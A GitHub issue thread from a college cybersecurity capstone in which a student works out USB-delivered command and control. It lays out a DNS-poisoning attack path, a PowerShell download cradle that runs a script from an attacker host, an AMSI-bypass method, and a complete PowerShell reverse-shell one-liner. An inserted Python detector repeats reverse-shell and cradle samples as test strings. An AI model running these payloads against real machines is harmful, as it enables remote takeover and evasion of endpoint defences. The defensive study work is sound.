serate-actual / CNCS-Capstone

Senior Capstone project for Champlain College's Computer Networking and Cybersecurity B.S. program

Research and implement ways to establish Command & Control #17

Closed serate-actual closed 2 years ago

serate-actual commented 2 years ago

SSH sessions
Web Shells

Maybe display a metasploitable shell? This would be really cool but also a HUGE reach.

serate-actual commented 2 years ago

Lv. 0: Netcat/telnet shell

Lv. 1: Web Shell. See: https://hacksland.net/build-a-simple-web-shell/

serate-actual commented 2 years ago

https://www.hackingtutorials.org/networking/hacking-netcat-part-2-bind-reverse-shells/

Okay, hear me out. A netcat shell REQUIRES I know an IP of an attacker box. What if I couple this with a DNS poisoning attack? I.e. I open netcat to mydomain.net, but mydomain.net is DNS poisoned to my attack box. I could easily create the "dumb" netcat script, and then create the SMART netcat script.

serate-actual commented 2 years ago

Okay, netcat isn't default on Windows. Help.

Solution 1 - wget/curl/equivalent nc.exe and run it and then delete later
Solution 2 - Understand what's going on with the powershell thing here

Okay, it looks like a blend of solution 1 & solution 2 is what I will use. Currently, the attack path looks like:

  1. set up an attacker box with a web server/dns poisoning/ command & control stuff on it
  1.5. DNS poison attackerbox.com to the web server, which has my dictionary of exploits/webshells on it
  1.75. Start a netcat session on my attacker box
  2. get someone to plug in my usb
  3. usb types in powershell -exec bypass -f http://attackerbox.com/nc.ps1
    • nc.ps1 is the commands for a web shell / literally anything else & also references my attacker box by attackerbox.com
  4. win

serate-actual commented 2 years ago

Currently setting up a script for kali to set up web server

serate-actual commented 2 years ago

https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3 maybe helpful for netcat reverse shell

serate-actual commented 2 years ago

Okay, I tried that netcat reverse shell. Bravo Windows Defender, you blocked it.

https://github.com/danielbohannon/Invoke-Obfuscation

I'm gonna try this tool now.

serate-actual commented 2 years ago

Okay, the obfuscation module is broken. However, I demo'd it with Windows Defender DISABLED.

serate-actual commented 2 years ago

https://pentestlaboratories.com/tag/obfuscation/

Probably going to try base64 encoding just to get it done.

serate-actual commented 2 years ago

This works to bypass Windows Defender by bypassing AMSI (basically the utility that scans for malicious code), by setting the amsiInitFailed flag to prevent AMSI from running.

From Fabian Mosch

serate-actual commented 2 years ago

Okay, so the oneliner for netcat is broken??

IT SHOULD print like this:

$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

HOWEVER THIS happens

-ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ); (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ); $client = New-Object System.Net.Sockets.TCPClient("192.168.50.44,4444");$stream = $client.GetStream();[byte[]]$bytes = ))\

-ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ); (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ); $client = New-Object System.Net.Sockets.TCPClient("192.168.50.44,4444");$stream = $client.GetStream();[byte[]]$bytes = *b

It kinda dies at the bytes = section. It looks like it's not affected by the syntax. I am going to see how much lorem ipsum my digispark can print before having an error.
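
Detection logic for the two techniques this thread settles on, the amsiInitFailed tamper flag and the TCPClient one-liner, written from the defender's side as an added example; it is not code from the capstone project. It scans PowerShell script-block text, first decoding any -EncodedCommand payload (the base64 route mentioned earlier), and the sample blocks, hostnames and addresses below are constructed placeholders.

```python
import base64
import re

# Loose, case-insensitive indicators, keyed by what they evidence.
INDICATORS = {
    "amsi_flag":  re.compile(r"amsiInitFailed", re.I),
    "tcp_client": re.compile(r"Net\.Sockets\.TCPClient", re.I),
    "get_stream": re.compile(r"\.GetStream\(\)", re.I),
    "iex":        re.compile(r"\b(?:iex|Invoke-Expression)\b", re.I),
    "download":   re.compile(r"\b(?:curl|wget|Invoke-WebRequest|DownloadString)\b", re.I),
}
# -EncodedCommand (and its short forms) carries a base64-encoded UTF-16LE script.
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)

def expand_encoded(script: str) -> str:
    """Append the decoded text of any -EncodedCommand payload so hidden content is scanned too."""
    decoded = []
    for m in ENC_RE.finditer(script):
        try:
            decoded.append(base64.b64decode(m.group(1)).decode("utf-16-le"))
        except (ValueError, UnicodeDecodeError):
            continue  # not a real encoded command; scan only the visible text
    return "\n".join([script, *decoded])

def classify(script: str) -> list[str]:
    """Return the technique labels one script block matches; an empty list means nothing flagged."""
    text = expand_encoded(script)
    hits = {name for name, rx in INDICATORS.items() if rx.search(text)}
    verdicts = []
    if "amsi_flag" in hits:
        verdicts.append("amsi_tamper")
    if {"tcp_client", "get_stream", "iex"} <= hits:   # the TCPClient one-liner shape
        verdicts.append("reverse_shell")
    if {"download", "iex"} <= hits:                   # fetch-and-execute cradle
        verdicts.append("download_cradle")
    return verdicts

# Constructed sample script blocks, not real logs; hosts and addresses are placeholders.
SAMPLES = {
    "benign":   "Get-ChildItem C:\\Users | Where-Object { $_.PSIsContainer }",
    "revshell": ('$client = New-Object System.Net.Sockets.TCPClient("192.0.2.10",4444);'
                 '$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};'
                 'while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){'
                 '$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);'
                 '$sendback = (iex $data 2>&1 | Out-String );$stream.Flush()};$client.Close()'),
    "cradle":   "iex (curl http://attackerbox.example/nc.ps1 -UseBasicParsing).Content",
    # Only the flag name, hidden inside an encoded command; this is not a working bypass.
    "encoded":  "powershell -enc " + base64.b64encode("Write-Host amsiInitFailed".encode("utf-16-le")).decode(),
}
```

Run `classify(block)` over each 4104 script-block event; the per-indicator regexes are intentionally loose, so the combined verdicts are what to alert on.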

serate-actual commented 2 years ago

Okay, the lorem ipsum test was very . . . enlightening. It compiles and uploads, but DOESN'T do anything with a certain amount of text (like 2-3 lines of lorem ipsum). HOWEVER, it does really well with just printing repeated text (probably something to do with memory). This probably also explains the corruption at the end of it, due to some memory issues.

serate-actual commented 2 years ago

510 characters = arduino has a bad time
313 characters = happy arduino
It's not 255 or 512 . . . HELP WHY DOESN'T IT MAKE SENSE

I guess I'll have to curl literally everything and pass it directly to powershell, which works.

Time to figure out dns poisoning :)

serate-actual commented 2 years ago

https://null-byte.wonderhowto.com/how-to/tutorial-dns-spoofing-0167796/

Okay, here goes the rough idea of my attack:

  1. set up ettercap DNS poisoning (whole network, but for my tests, just a selected IP)
  2. user plugs in usb
  3. USB flushes the dns cache
  4. USB curls the poisoned IP and sends the output to powershell
  5. win!!!

serate-actual commented 2 years ago

Making a python script

serate-actual commented 2 years ago

Python script finished - at https://github.com/SirSertile/CNCS-Capstone/tree/main/Design%20Files/Rubber%20Ducky/PythonScript